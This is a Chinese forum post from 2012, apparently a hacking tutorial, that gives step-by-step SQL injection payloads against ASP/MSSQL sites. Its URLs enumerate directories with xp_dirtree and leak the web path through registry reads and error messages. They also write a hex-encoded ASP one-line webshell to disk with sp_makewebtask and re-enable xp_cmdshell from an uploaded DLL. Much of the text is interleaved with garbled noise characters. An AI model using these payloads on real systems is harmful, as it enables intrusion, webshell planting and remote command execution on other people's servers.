好,我们exec master..xp_dirtree'd:/test'% V+ e4 e, t. ^. q# I: N% H
假设我们在test里有两个文件夹test1和test2在test1里又有test3. Z# s0 F& C3 S) h$ ~, l6 \( p
结果显示
# T( E$ c7 W# F! G) B9 F( M9 [ \2 {" s+ n0 X6 [% k$ R
subdirectory depth6 m: c3 D( g: q
test1 1
( M; h5 k6 H$ I" F+ Z" I% btest3 2
( t: S0 i# q6 `6 b! ~# _$ u7 q9 Ztest2 1
, i1 W! V8 I: a/ O$ w& m: w/ u' i7 D1 E7 ]: S% z$ L
哈哈发现没有那个depth就是目录的级数1 F% K# @! R' g, x2 J, H/ |2 X
ok了,知道怎么办了吧. c+ {0 Y0 _1 R, O4 m
* F+ R# u( j* ~$ d. rhttp://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)-- 7 T" f6 |# @, u- _8 Q
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' -- C& ^7 Z2 a4 D* K+ n- E) e _
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-8 w2 X( S6 V N# i4 o* F
u/ j' R! v+ r+ q
只要加上id=1,就是第一级目录 。
8 b! ]4 v9 j8 ^' Q. j
$ D# A% J+ r$ v7 u- a6 N6 ~7 I- b3 I& s+ c6 x l |* n5 Z" d8 v. ?
通过注册表读网站路径:' d/ v. S4 Z3 W
( |% F' o% l9 j# h* |8 j- \$ H1.;create table [dbo].[cyfd] ([gyfd][char](255));
: Q# A) u q, T6 Q) B/ e) V/ T- E
: |0 t$ \+ b) Y7 a4 C. v3 I2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--3 q5 a( _$ d7 w) Y7 G6 |* z, ]
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
8 }/ H) J8 r1 z ^$ ^2 c! a3 i
' a5 L0 s2 n' z* h" w0 k( `% ]0 [3.and 1=(select count(*) from 临时表 where 临时字段名>1)% p6 A: ~( Z) \/ J: e j$ V/ Q
and 1=(select count(*) from cyfd where gyfd > 1)
3 { I$ V8 a5 Z, Q* p这样IE报错,就把刚才插进去的Web路径的值报出来了
8 Q ^. ], c% T0 Q$ I, d6 _) m
# O4 E& H$ O1 e" M& U4.drop table cyfd;-- 删除临时表
6 E6 c7 r, w; {6 ]2 c* A2 [( I* [3 y7 f* F
获得webshell方法:2 ?/ d# x% \% F4 V2 x# d
1.create table cmd (a image)-- \**cmd是创建的临时表
* W$ ~# M6 F$ X; H$ A' k, d* B [: R% E7 G5 ~
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
. ?6 s; P/ M/ Y2 ~/ Y( q D- D% p# d! Q) O2 X. l
3 I& X% s0 E0 ?. X' r
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
1 W1 z4 I( V- [; H! q% dEXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
8 C* w/ l6 b7 q! s6 j' Z( d; V- U8 x" Q2 Y
4.drop table cmd;-- 删除cmd临时表
/ w- w Q7 g9 h* s, s, ?8 X% A. l+ z" Z" G; Q* D$ r
恢复xp_cmdshell方法之一:
, s% ~& R3 J( h% e% Y) w6 K我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
9 M ]& Z8 U) O% Y5 e3 ghttp://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
6 a3 |% a$ L# I: |& o) S7 d( N恢复,支持绝对路径的恢复哦。:)
5 `+ G O! o( J7 l6 u% p |
发表于 2012-9-13 17:20:30
收藏
支持
反对